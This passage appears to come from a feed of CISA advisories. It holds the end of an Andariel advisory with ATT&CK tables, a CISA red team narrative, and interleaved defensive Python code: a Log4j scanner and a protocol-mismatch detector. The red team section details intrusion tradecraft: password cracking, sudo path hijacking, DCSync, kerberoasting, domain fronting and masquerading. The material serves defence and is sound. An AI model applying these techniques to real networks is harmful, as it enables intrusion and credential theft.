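    """Scan a constructed tree: one vulnerable log4j-core, one fixed, one unrelated JAR."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "lib")
        os.makedirs(lib)
        _write_sample_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
        _write_sample_jar(os.path.join(lib, "log4j-core-2.17.1.jar"), "2.17.1")
        with zipfile.ZipFile(os.path.join(lib, "other.jar"), "w") as jar:
            jar.writestr("com/example/App.class", b"")
        return sorted(scan_tree(root), key=lambda f: f["version"])


if __name__ == "__main__":
    for finding in demo():
        print(finding["version"], "needs_action=%s" % finding["needs_action"],
              "JndiLookup=%s" % finding["jndi_lookup_present"])
```

    Point scan_tree at real application directories to produce the asset list the upgrade step needs; JARs nested inside other archives are not unpacked by this version.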
    Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).
    Endpoint Activity
    Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets.
    Command Line Activity and Remote Access
    Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.
    Packing
    Signatures for Themida, VMProtect and a number of other packers are available here; however, the signatures will not identify every file packed using these applications.
    Additional Mitigation Measures for Malicious Activities
    - Check for security vulnerabilities, apply patches, and update to the latest version of software
    - Encrypt all sensitive data including personal information
    - Block access to unused ports
    - Change passwords when they are suspected of being compromised
    - Alert on unexpected use of dual-use applications
    - Strengthen the subscriber identity authentication process for leased servers
    DPRK Rewards for Justice
    The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward.
    If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/.
    Acknowledgements
    Mandiant and Microsoft Threat Intelligence contributed to this CSA.
    Disclaimer of Endorsement
    Your organization has no obligation to respond or provide information in response to this product. If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law. The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors.
    Version History
    - July 25, 2024: Initial version.
    - August 6, 2024: Updated “Credential Access” and “Commodity Malware and Dual-Use Applications” sections.
    Trademark Recognition
    Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.
    Purpose
    This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
    Contact
    U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.
    - DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil
    - DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil
    - NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
    - NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
    - NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
    Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below.
    - National Intelligence Service: www.nis.go.kr, +82 111
    References
    - AhnLab Security Emergency Response Center: https://asec.ahnlab.com/en/56405/, https://asec.ahnlab.com/en/59073/, https://asec.ahnlab.com/en/66088/
    - Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html
    - Cisco Talos Intelligence blogs: https://blog.talosintelligence.com/lazarus-three-rats/, https://blog.talosintelligence.com/lazarus-magicrat/, https://blog.talosintelligence.com/lazarus-collectionrat/, https://blog.talosintelligence.com/lazarus-quiterat/
    - DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499
    - Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar
    - JPCERT blogs: https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html, https://blogs.jpcert.or.jp/en/2022/07/yamabot.html
    - Mandiant blogs: https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023, https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government
    - Microsoft blogs:
      https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
      https://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/
    - NCSC Guidance: Alert: Apache Log4j Vulnerabilities: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability; Information: https://www.ncsc.gov.uk/information/log4j-vulnerability-what-everyone-needs-to-know
    - Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research
    - VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html
    - WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector
    Appendix: MITRE ATT&CK Techniques and Software
    The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.
    Table 3. Reconnaissance and Enumeration
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | Gather Victim Org Information | T1591 | The actors gather information about the victim’s organization that can be used during targeting. |
    | Gather Victim Host Information | T1592 | The actors gather information about the victim’s hosts that can be used during targeting. |
    | Active Scanning | T1595 | The actors execute active reconnaissance scans to gather information that can be used during targeting. |
    | Search Open Technical Databases | T1596 | The actors search freely available technical databases for information about victims that can be used during targeting. |
    Table 4. Resource Development, Tooling, and Remote Access Tools (RATs)
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | OS Credential Dumping | T1003 | The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. |
    | Exfiltration Over Alternative Protocol | T1048 | The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel. |
    | Proxy | T1090 | The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. |
    | Archive Collected Data | T1560 | The actors compress and/or encrypt data that is collected prior to exfiltration. |
    | Protocol Tunneling | T1572 | The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. |
    | Develop Capabilities: Malware | T1587.001 | The actors develop malware and malware components that can be used during targeting. |
    | Develop Capabilities: Exploits | T1587.004 | The actors develop exploits that can be used during targeting. |
    Table 5. Software used for Resource Development, Tooling, and RATs
    | Software Title | ID | Use |
    | --- | --- | --- |
    | Mimikatz | S0002 | The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. |
    | AdFind | S0552 | The actors use a free command-line query tool that can be used for gathering information from the Active Directory. |
    Table 6. Initial Access
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | Exploit Public-Facing Application | T1190 | The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network. |
    Table 7. Execution
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | Command and Scripting Interpreter | T1059 | The actors abuse command and script interpreters to execute commands, scripts, or binaries. |
    Table 8. Defense Evasion
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | Obfuscated Files or Information | T1027 | The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit. |
    Table 9. Credential Access
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | OS Credential Dumping | T1003 | The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. |
    Table 10. Discovery and Lateral Movement
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | Remote Services | T1021 | The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. |
    | Remote Services: SMB/Windows Admin Shares | T1021.002 | The actors use valid accounts to interact with a remote network share using Server Message Block (SMB). |
    | File and Directory Discovery | T1083 | The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. |
    | Account Discovery | T1087 | The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. |
    Table 11. Command and Control
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | Application Layer Protocol | T1071 | The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus. |
    | Proxy | T1090 | The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. |
    Table 12. Collection and Exfiltration
    | Technique Title | ID | Use |
    | --- | --- | --- |
    | Data from Network Shared Drive | T1039 | The actors search network shares on computers they have compromised to find files of interest. |
    | Exfiltration Over Alternative Protocol | T1048 | The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server. |
    | Archive Collected Data | T1560 | The actors compress and/or encrypt data that is collected prior to exfiltration. |
    | Exfiltration Over Web Service | T1567 | The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. |

  • CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth
    by CISA (CISA Cybersecurity Advisories) on 9 Luglio 2024 at 2:09 pm

    EXECUTIVE SUMMARY
    In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture. Then, the team works directly with the organization’s network defenders, system administrators, and other technical staff to address strengths and weaknesses found during the assessment. The team’s goal is to assist the organization with refining their detection, response, and hunt capabilities—particularly hunting unknown threats.
    In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s activity and tactics, techniques, and procedures (TTPs); associated network defense activity; and lessons learned to provide network defenders with recommendations for improving their organization’s detection capabilities and cyber posture.
    During the first phase, the SILENTSHIELD team gained initial access by exploiting a known vulnerability in an unpatched web server in the victim’s Solaris enclave. Although the team fully compromised the enclave, they were unable to move into the Windows portion of the network due to a lack of credentials. In a parallel effort, the team gained access to the Windows network through phishing. They then discovered unsecured administrator credentials, allowing them to pivot freely throughout the Windows environment, which resulted in full domain compromise and access to tier zero assets.
    The team then identified that the organization had trust relationships with multiple external partner organizations and was able to exploit and pivot to an external organization. The red team remained undetected by network defenders throughout the first phase.
    The red team’s findings underscored the importance of defense-in-depth and using diversified layers of protection. The organization was only able to fully understand the extent of the red team’s compromise by running full diagnostics from all data sources. This involved analyzing host-based logs, internal network logs, external (egress) network logs, and authentication logs. The red team’s findings also demonstrated the value of using tool-agnostic and behavior-based indicators of compromise (IOCs) and of applying an “allowlist” approach to network behavior and systems, rather than a “denylist” approach, which predominantly results in an unmanageable amount of noise.
    The red team’s findings illuminated the following lessons learned for network defenders about how to reduce and respond to risk:
    - Lesson learned: The assessed organization had insufficient controls to prevent and detect malicious activity.
    - Lesson learned: The organization did not effectively or efficiently collect, retain, and analyze logs.
    - Lesson learned: Bureaucratic processes and decentralized teams hindered the organization’s network defenders.
    - Lesson learned: A “known-bad” detection approach hampered detection of alternate TTPs.
    To reduce risk of similar malicious cyber activity, CISA encourages organizations to apply the recommendations in the Mitigations section of this advisory, including those listed below:
    - Apply defense-in-depth principles by using multiple layers of security to ensure comprehensive analysis and detection of possible intrusions.
    - Use robust network segmentation to impede lateral movement across the network.
    - Establish baselines of network traffic, application execution, and account authentication.
      Use these baselines to enforce an “allowlist” philosophy rather than denying known-bad IOCs.
    - Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric.
    CISA recognizes that insecure software contributes to these identified issues and urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this CSA, including those listed below, to harden customer networks against malicious activity and reduce the likelihood of domain compromise:
    - Eliminate default passwords.
    - Provide logging at no additional charge.
    - Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents.
    Download the PDF version of this report: AA24-193A CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth (PDF, 1.18 MB)
    INTRODUCTION
    CISA has authority to hunt for and identify, with or without advance notice to or authorization from agencies, threats and vulnerabilities within federal information systems (see generally 44 U.S.C. § 3553[b][7]). The target organization for this assessment was a large U.S. FCEB organization.
    CISA conducted the SILENTSHIELD assessment over an approximately eight-month period in 2023, with three of the months consisting of a technical collaboration phase:
    - Adversary Emulation Phase: The team started by emulating a sophisticated nation-state actor by simulating known initial access and post-exploitation TTPs. The team’s goal was to compromise the assessed organization’s domain and identify attack paths to other networks. After completion of their initial objectives, the team diversified its deployed tools and tradecraft to mimic a wider and often less sophisticated set of threat actors to elicit network defender attention.
      CISA red team members did not clean up or delete system logs, allowing defenders to investigate all artifacts and identify the full scope of a breach.
    - Collaboration Phase: The SILENTSHIELD team met regularly with senior staff and technical personnel to discuss issues with the organization’s cyber defensive capabilities. During this phase, the team:
      - Proposed new behavior-based and tool-agnostic detections to uncover additional tradecraft used during the Adversary Emulation Phase. They also evaluated the organization’s improvements according to current CISA priorities and public guidance.
      - Troubleshot existing detection steps to show how certain TTPs evaded IOC-based detections.
      - Deconflicted events from CISA red team activity, indicating unexpected network/application behavior or the potential presence of a real adversary in the network.
    Note: The team’s goal during this phase was to build the organization’s ability to detect malicious activity based on adversary behavior (i.e., TTPs) vice relying on known IOCs.
    This advisory, drafted in coordination with the assessed organization, details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders recommendations for improving their organization’s defensive cyber posture. The advisory also provides recommendations to software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.
    TECHNICAL DETAILS
    Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
    During the Adversary Emulation phase, the red team gained initial access to the organization’s Solaris enclave by exploiting a known vulnerability in an unpatched web server. They gained separate access to the Windows environment by phishing and were able to compromise the full domain and its parent domain. See Figure 1 for a timeline of this assessment and the sections below for details on the team’s activity and TTPs.
    Figure 1: SILENTSHIELD assessment timeline
    Adversary Emulation Phase
    Exploitation of the Solaris Enclave
    Reconnaissance, Initial Access, and Command and Control
    CISA’s red team used open source tools and third-party services to probe the organization’s internet-facing surface [T1594]. This included non-intrusive port scans for common ports and Domain Name System (DNS) enumeration [T1590.002]. These efforts revealed the organization’s web server was unpatched for CVE-2022-21587, an unauthenticated remote code execution (RCE) vulnerability in Oracle Web Applications Desktop Integrator. For three months the assessed organization failed to patch this vulnerability, and the team exploited it for initial access.
    The exploit provided code execution on a backend application server (SERVER 1) that handled incoming requests from the public-facing web server. The red team used this exploit to upload and run a secure Python remote access tool (RAT). Because the application server had full external internet egress via Transmission Control Protocol (TCP) ports 80 and 443, the RAT enabled consistent command and control (C2) traffic [T1071.001].
    Note: After gaining access, the team promptly informed the organization’s trusted agents of the unpatched device, but the organization took over two weeks to apply the available patch. Additionally, the organization did not perform a thorough investigation of the affected servers, which would have turned up IOCs and should have led to a full incident response.
    About two weeks after the team obtained access, exploit code was released publicly into a popular open source exploitation framework. CISA identified that the vulnerability was exploited by an unknown third party. CISA added this CVE to its Known Exploited Vulnerabilities Catalog on Feb. 2, 2023.
    Credential Access, Command and Control, and Privilege Escalation
    Once on SERVER 1, the red team probed the host’s files and folder structure [T1005] and identified several old and globally accessible .tar backup files, which included a readable copy of an /etc/shadow file containing the hash for a privileged service account (ACCOUNT 1). The team quickly cracked the account’s weak password using a common wordlist [T1110.002]. They then established an outbound Secure Shell Protocol (SSH) connection over TCP port 80 and used a reverse tunnel to SSH back into SERVER 1, where they were prompted to reset ACCOUNT 1’s expired password [T1571] (see Figure 2). The team identified the account was enabled on a subset of containers, but it had not been actively used in a significant amount of time; the team changed this account’s password to a strong password.
    Figure 2: Exploitation of the Solaris Enclave
    The team discovered ACCOUNT 1 was a local administrator with sudo/root access and used it to move laterally (see the next section).
    Lateral Movement and Persistence
    Servers in the Solaris enclave did not use centralized authentication but had a mostly uniform set of local accounts and permissions [T1078.002]. This allowed the red team to use ACCOUNT 1 to move through much of the network segment via SSH [T1021.004]. Some servers allowed external internet access and the team deployed RATs on a few of these hosts for C2. They deployed several different RATs to diversify network traffic signatures and obfuscate the on-disk and in-memory footprints.
    These tools communicated to a red team redirector over TCP/443, through valid HTTPS messages, and over SSH through non-standard ports (80 and 443) [T1571]. Much of the traffic was not blocked by a firewall, and the organization lacked application layer firewalls capable of detecting protocol mismatches on common ports.
    The team then moved laterally to multiple servers, including high value assets, that did not allow internet access. Using reverse SSH tunnels, the team moved into the environment and used a SOCKS proxy [T1090] to progress forward through the network. They configured implants with TCP bind listeners bound to random high ports to connect directly with some of these hosts without creating new SSH login events (see Figure 3).
    Figure 3: Example of Lateral Movement in the Solaris Enclave
    Once on other internal hosts, the team data mined each for sensitive information and credentials. They obtained personally identifiable information (PII), shadow files, a crackable pass-phrase protected administrator SSH key, and a plaintext password [T1552.003] in a user’s .bash_history. These data mined credentials provided further avenues for unprivileged access through the network. The team also used SSH tunnels to remotely mount Network File System (NFS) file shares, spoofing uid and gid values to access all files and folders.
    To protect against reboots or other disruptions, the team primarily persisted on hosts using the cron utility [T1053.003], as well as the at utility [T1053.002], to run scheduled tasks and blend into the environment. Additionally, SSH private keys provided persistent access to internal pivot hosts and would have continued to enable access even if passwords were rotated.
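    The gap noted above, SSH carried over TCP 80 and 443 with no application-layer inspection to spot the protocol mismatch, can be covered by a first-bytes check on egress flows. The following is an added example, not a tool from the advisory: a Python classifier that looks at the first bytes a client sends on a flow, decides whether they look like SSH, TLS or plaintext HTTP, and flags flows whose destination port does not match; the port expectations and the captured payloads are constructed assumptions for the example.

```python
"""Protocol-mismatch check for flows to well-known ports (added example, not CISA tooling).
Classifies the first client bytes of a TCP flow and flags SSH (or anything else)
on ports that should only carry HTTP or TLS."""

# What a port-based firewall implicitly assumes for these ports (assumption).
EXPECTED_BY_PORT = {80: {"http"}, 443: {"tls"}, 22: {"ssh"}}

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ",
                b"PATCH ", b"CONNECT ", b"TRACE ")


def classify_payload(data):
    """Return 'ssh', 'tls', 'http' or 'unknown' from the first bytes of a flow."""
    if data.startswith(b"SSH-"):
        # SSH identification string; both client and server send one (RFC 4253).
        return "ssh"
    if (len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03
            and data[2] in (0x00, 0x01, 0x02, 0x03, 0x04) and data[5] == 0x01):
        # TLS record: content type handshake (22), version 3.x, ClientHello (1).
        return "tls"
    if data.startswith(HTTP_METHODS) and b" HTTP/" in data[:256]:
        return "http"
    return "unknown"


def flag_mismatches(flows):
    """flows: iterable of (src, dst_port, first_client_bytes). Returns the odd ones."""
    alerts = []
    for src, dst_port, data in flows:
        expected = EXPECTED_BY_PORT.get(dst_port)
        if expected is None:
            continue  # a port this check does not cover
        seen = classify_payload(data)
        if seen not in expected:
            alerts.append({"src": src, "dst_port": dst_port,
                           "observed": seen, "expected": sorted(expected)})
    return alerts


# Constructed sample flows (not real captures).
SAMPLE_FLOWS = [
    ("10.10.5.21", 443, b"SSH-2.0-OpenSSH_8.4\r\n"),                    # SSH on 443
    ("10.10.5.22", 80, b"GET /index.html HTTP/1.1\r\nHost: x\r\n\r\n"),  # normal HTTP
    ("10.10.5.23", 443, bytes.fromhex("160301007a010000760303") + b"\x00" * 16),
    ("10.10.5.24", 80, b"SSH-2.0-OpenSSH_8.4\r\n"),                     # SSH on 80
    ("10.10.5.25", 8443, b"\x00\x01\x02"),                              # not covered
]

if __name__ == "__main__":
    for alert in flag_mismatches(SAMPLE_FLOWS):
        print(alert)
```

    Tools that wrap their C2 in valid HTTPS, as the advisory says some of the RATs did, pass this check unchanged; it catches only protocol mismatches, which is why it belongs alongside egress allowlisting and traffic baselining rather than in place of them.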
    Full Enclave Compromise
    Although ACCOUNT 1 allowed the team to move laterally to much of the Solaris enclave, the account did not provide privileged access to all hosts in the network because a subset of hosts had changed the password (which denied privileged access via that account). However, the team analyzed recent user logins using the last command and identified a network security appliance scanning service account (ACCOUNT 2) that logged in regularly to an internal host using password-based authentication. As part of its periodic vulnerability scanning, ACCOUNT 2 would connect to each host via SSH and run sudo with a relative path instead of the absolute path /usr/local/bin/sudo. The local path created a path hijack vulnerability, which allowed the red team to hijack the execution flow and capture the account’s password [T1574.007]. The harvested password granted unrestricted privileged access to the entire Solaris enclave.
    Exploitation of the Windows Domain
    While the compromise of the Solaris enclave facilitated months of persistent access to sensitive systems, including web applications and databases, it did not lead to the immediate compromise of the corporate Windows environment. Once in the Windows domain, the red team identified several service accounts with weak passwords. It is likely that an adversary could have continued the Solaris attack path through prolonged password spraying attacks, or by leveraging credentials obtained externally (e.g., dark web credential dumps) (see Figure 4).
    Figure 4: Exploitation of Solaris enclave
    The team exploited the Windows domain through other access vectors and eventually proved the undetected pivot between the domains could be made after they obtained Windows credentials.
    Reconnaissance and Initial Access
    While attempting to pivot into Windows from Solaris, the red team conducted open source information gathering about the organization.
    They harvested employee names [T1589.003] and used the information to derive email addresses based on the target’s email naming scheme. After identifying names, emails, and job titles, the team selected several phishing targets who regularly interacted with the public [T1591.004]. One user triggered a phishing payload that provided initial access to a workstation. The team then placed a simple initial access RAT on the workstation in a user-writable folder and obtained user-level persistence through an added registry run key, which called back to a red team redirector via HTTPS. The team assessed what was running on the host in terms of antivirus (AV) and Endpoint Detection and Response (EDR) and used the implant to inject a more capable, full-fledged RAT directly into memory, which pointed to a separate redirector. The assessed organization’s tools failed to categorize C2 traffic as anomalous even when a bug in one of the implants caused 8 GB of continuous network traffic to flow in one afternoon.
    Credentialed Access and Privilege Escalation
    Internal network information was freely available to unprivileged, domain-joined users, and the team queried hundreds of megabytes of Active Directory (AD) data using a custom rewrite of dsquery.exe in .NET and Beacon Object File (BOF) ldapsearch from the phished user’s workstation. The team then data mined numerous internal file servers for accessible shares [T1083]. The team found a password file left from a previous employee on an open, administrative IT share, which contained plaintext usernames and passwords for several privileged service accounts. With the harvested Lightweight Directory Access Protocol (LDAP) information, the team identified one of the accounts (ACCOUNT 3) had System Center Operations Manager (SCOM) administrator privileges and domain administrator privileges for the parent domain. They identified another account (ACCOUNT 4) that also had administrative permissions for most servers in the domain.
    The passwords for both accounts had not been updated in over eight years and were not enrolled in the organization’s identity management (IDM).
    Lateral Movement and Persistence
    The team used valid accounts and/or tokens with varied techniques for lateral movement. Techniques included scheduled task manipulation, service creation, and application domain hijacking [T1574.014]. For credential usage, the implemented IDM in the organization’s network hampered the red team’s ability to pivot as it blocked common credential manipulation techniques like pass-the-hash [T1550.002] and pass-the-ticket [T1550.003]. The red team found ways to circumvent the IDM, including using plaintext passwords to create genuine network logon sessions [T1134.003] for certain accounts not registered with the IDM, as well as impersonating the tokens of currently logged-in users to piggyback off valid sessions [T1134.001].
    The red team tailored payloads to blend with the network’s environment and did not reuse IOCs like filenames or file hashes, especially for persisted implants. Remote queries for directory listings, scheduled tasks, services, and running processes provided the information for the red team to masquerade as legitimate activity [T1036.004]. The team emulated normal network activity by installing HTTPS beaconing agents on workstations where normal users browse the web, establishing internal network pivots with TCP bind and SMB listeners. They primarily relied on creating Windows services as their persistence mechanism.
    The red team used the data mined credentials for ACCOUNT 3 to move laterally from the workstation to a SCOM server. Once there, using ACCOUNT 4, the team targeted a System Center Configuration Manager (SCCM) server, as it was an advantageous network vantage point.
The SCCM server had existing logged-in server administrators whose usernames followed a predictable naming pattern (correlating administrative roles and privilege levels), allowing the team to determine which account to use to pivot to other hosts. The team targeted the organization’s jump servers frequented by highly privileged administrative accounts. Red team operators used stolen SCCM server administrator credentials to compromise one of the organization’s server-administrator jump hosts. They learned that the organization separated some, but not all, accounts onto separate jump servers by role (e.g., workstation administrators and server administrators had separate jump points, but server and domain administrators occasionally shared the same jump hosts). Once a domain administrator logged in, the red team stole the administrator’s session token and laterally moved to a domain controller, where they pulled credentials for the entire domain via DCSync [T1003.006], obtaining full domain compromise (see Figure 5).

Figure 5: Exploitation of the Windows Domain

After compromising the domain, the team confirmed access to sensitive servers, including multiple high value assets (HVAs) and tier zero assets. None of the accessed servers had any noticeable additional protections or network access restrictions despite their sensitivity and critical functions in the network. Remote administration and access of these critical systems should be restricted to designated, role-based accounts coming from specific network enclaves and/or workstations. Isolation with these access vector limitations protects them from compromise and sharply reduces the associated noise, allowing defenders to more easily identify abnormal behavior.
Pivoting Into External Trusted Partners

The team inspected the organization’s trust relationships with other organizational domains through LDAP [T1482] and identified connections to multiple external FCEB partner organizations, one of which they subsequently used to move laterally. The team pulled LDAP information from PARTNER DC 1 and kerberoasted the domain, yielding one valid service account with a weak password they quickly cracked, but the team was unable to move laterally with this account because it lacked appropriate privileges. However, PARTNER 1 had trusted relationships with a second partner’s domain controller (PARTNER DC 2). Using the acquired PARTNER 1 credentials, the red team discovered PARTNER 2 also had a kerberoastable, highly privileged administrative service account whose password cracked, allowing the team to laterally move to a PARTNER 2 host from the original victim network (see Figure 6).

Figure 6: Path of Exploitation into External FCEB Organizations

These cross-organizational attack paths are rarely identified or tested in regular assessments or audits due to network ownership, legal agreements, and/or vendor opacity. However, they remain a valuable access vector for advanced persistent threat (APT) actors. Experimentation with access into trusted partner domains included the modification of local system firewall rules on the source domain controller to allow specific source and destination IPs. The organization’s host-based monitoring systems failed to identify the addition and removal of the red team’s firewall exceptions.

Defense Evasion Techniques

Solaris Enclave

Due to the lack of application allowlisting, the red team regularly masqueraded as legitimate software to remain undetected by the organization’s network defenders [T1036].
Additionally, by default, command auditing in Solaris via the lastcomm command only captures the program being run; the full file path and any command line arguments are not recorded. For example:

A real file: /opt/splunkforwarder/bin/splunkd
A malicious copy: /opt/splunkforwarder/splunkd
Command auditing logs: splunkd

The team also hid common artifacts to obfuscate their operational activity, including modifying file timestamps [T1070.006] and permissions with the touch and chmod/chown commands [T1222.002] to blend with other files in the environment.

Windows Domain

The team used a diverse range of accounts, backdoors, and C2 channels with different network footprints to obfuscate activity [T1027]. Diversification of account usage, backdoors, and C2 channels further obfuscated red team activity in the domain. Lateral movement to new hosts featured a variety of accounts to reduce the risk of detection. When harvesting credentials, the team selected several backup accounts for each role (e.g., server admin, workstation admin, domain admin, service accounts) in case the intended account was locked, disabled, or flagged as compromised. To emphasize the value of tool-agnostic/behavior-based detections, the red team deployed over seven different implants to mimic real-world adversaries’ diverse use of open source, commercial off-the-shelf (COTS), and custom RATs. Each featured different host and network signatures to evade out-of-the-box EDR detections, and every implant had unique artifacts both on-disk and in-memory. The team also evaded EDR/AV by using proprietary loaders and beacon object files (BOFs) to make direct API calls and allow self-injection of .NET executables to run additional capabilities. All the deployed tools had different network C2 channel footprints. Some beaconing agents connected via HTTPS to legitimate domains owned by the red team. Others used domain fronting [T1090.004] to leverage common content delivery network (CDN) functionality.
Outbound traffic sent to public websites not owned by the red team had a Host header that told the CDN provider it should redirect traffic to red-team-controlled IP addresses. Internal pivots used SMB on port 445 and TCP bind listeners on ephemeral high ports. The team tailored both to mimic named pipes and network connections already seen in the domain and evade detection.

Collaborative Phase

Five months into the assessment, the red team officially notified the organization’s security operations center (SOC) of the ongoing activity and began engaging directly with SOC leadership. At this point, the organization had not submitted deconflictions and did not appear to be actively investigating CISA SILENTSHIELD assessment activity. During this phase, CISA refrained from providing TTPs or IOCs (such as concrete hosts, filenames, or C2 domains) to allow the organization to develop and test its own detection metrics. The team held weekly discussions with the organization’s senior technical staff, SOC, and system administrators, which led to measurable improvements in response times for known techniques and behavior-based detections that uncovered previously unknown tradecraft. Specifically, the red team worked with the organization to assist them with synthesizing the following data sources to identify the extent of the red team’s compromise:

• EDR alerts;
• YARA scans;
• C2 domains and techniques;
• Internal pivot hosts;
• Admin accounts used to pivot;
• Memory dumps, revealing attempts to pass credentials; and
• Email logs documenting the initial breach via phishing.

Every cyber threat actor has a unique set of TTPs. Nevertheless, nearly all adversaries perform the same basic steps:

• Command execution (initial access and lateral movement);
• Establish C2 channels and exfiltrate data;
• Establish persistence;
• Escalate privileges; and
• Use and abuse credentials.

All TTPs have corresponding artifacts, but not all IOCs are created equal.
Fixating on a hyper-focused set of IOCs can catch known threats but impedes efforts to identify unknown adversaries employing different TTPs. Major themes discussed during this phase that improved the organization’s behavior-based detection capabilities included log collection, forensic analysis, reliance on IOCs for detection, monitoring and investigation management, and Sysmon misconfigurations.

Log Collection

